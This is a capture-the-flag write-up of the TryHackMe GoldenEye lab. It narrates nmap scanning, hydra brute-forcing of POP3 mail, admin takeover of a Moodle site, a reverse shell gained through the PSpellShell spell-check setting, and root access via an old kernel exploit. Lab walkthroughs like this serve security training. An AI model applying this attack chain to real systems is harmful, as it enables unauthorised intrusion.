CTF-Writeups/TryHackMe/Goldeneye.md
2021-02-16 03:43:27 +05:00

5.3 KiB

TryHackMe-GoldenEye

NMAP

Nmap scan report for 10.10.81.165
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
55007/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE TOP CAPA PIPELINING USER UIDL RESP-CODES SASL(PLAIN) STLS
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 502.67 seconds

PORT 80

Looking at source code

This is an encoded text on visting cyberchef and decoding it using magic we decoded the text

InvincibleHack3 is the password for boris

But these creds are not right

So let's enumerate different ports

PORT 55007 (POP3)

I tired to brute force with boris but failed

Earlier from the source code of the web page we saw a message that "Natalya could break your code" so maybe that's a potential username that we need to brute force so again using hydra

After some time I was able to get the correct password

Also got boris's password with the fasttrack wordlist

Boris's Mail

Here we used telnet to connect to pop3 service and logged in with boris's credentials. We can see that there are 3 messages

Message 1

### Message 2 ### Message 3

Natalya's mail

We do the same with natalya's mail

Message 1

Message 2

So we found the creds and a domain , lets add the domain in /etc/hosts file

Navigate to severnaya-station.com/gnocertdir and login with xenia's credentials

Going to user's messages we can find a conversation with a user doak

We find doak's password with the same procedure

Doak's Mail

Message

Login as dr_doak on the website

This is the message we get from that text file

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Running exiftool on it we can find a base64 encoded text

Now we are logged in as admin. One thing we can do now is look for any exploits for Moodle

Getting a reverse shell

For some reason the exploit wasn't working . I double checked everything but still it was failing

So I went with the manual exploitation of moodle

Under settings go to plugins ->Text Editors -> TinyMCE HTML editor and make sure to select Spell Engine as PSpellShell

Then make a blog post entry and click on spell check icon , if you have setup your netcat listener you'll get a shell frorm the target machine

Looking for kernel version

This is a really old kernel for linux so hopeully there will be an exploit on exploit-db

Download ,compile and transfer it to target machine

But on running it gave an error because gcc was not installed on the machine

On googling I found cc which is alternate to gcc and it was on the box

So we had to edit the exploit by replacing gcc to cc and then again transfer the compiled source code to the box

We got root !!